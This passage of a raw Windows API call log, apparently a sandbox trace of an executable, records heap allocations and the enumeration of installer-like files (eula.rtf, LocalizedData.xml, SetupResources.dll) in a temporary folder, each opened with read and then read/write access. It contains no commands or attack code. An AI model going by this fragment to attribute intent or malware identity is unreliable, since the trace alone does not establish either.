lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0061.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0061.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71758 [0061.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0061.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0061.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0061.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0061.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.211] AreFileApisANSI () returned 1 [0061.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1044\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1044\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0061.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0061.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.211] AreFileApisANSI () returned 1 [0061.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0061.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 36 [0061.211] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.211] GetFileType (hFile=0x41c) returned 0x1 [0061.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.212] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.212] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.212] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.212] CloseHandle (hObject=0x41c) returned 1 [0061.212] AreFileApisANSI () returned 1 [0061.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0061.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 36 [0061.212] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.212] GetFileType (hFile=0x41c) returned 0x1 [0061.213] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0061.213] CloseHandle (hObject=0x41c) returned 1 [0061.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.213] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.213] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.213] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.213] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0061.213] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.213] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.213] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.213] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0061.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.213] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.213] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.213] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.213] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0061.213] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.213] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0061.213] AreFileApisANSI () returned 1 [0061.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0061.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 36 [0061.214] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbe6)) returned 1 [0061.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.214] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.214] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.214] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x135c0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0061.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0061.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0061.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0061.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0061.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0061.215] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.215] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.215] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.215] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.215] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.215] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.215] AreFileApisANSI () returned 1 [0061.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0061.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.215] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.215] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0061.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0061.215] AreFileApisANSI () returned 1 [0061.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b00 [0061.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 45 [0061.215] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.216] GetFileType (hFile=0x41c) returned 0x1 [0061.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0061.216] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.216] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.216] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.216] CloseHandle (hObject=0x41c) returned 1 [0061.216] AreFileApisANSI () returned 1 [0061.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0061.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 45 [0061.217] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.217] GetFileType (hFile=0x41c) returned 0x1 [0061.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.217] CloseHandle (hObject=0x41c) returned 1 [0061.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.218] AreFileApisANSI () returned 1 [0061.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b68 [0061.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 45 [0061.218] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x135c0)) returned 1 [0061.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0061.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0061.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.218] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.218] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.218] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0061.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0061.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0061.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 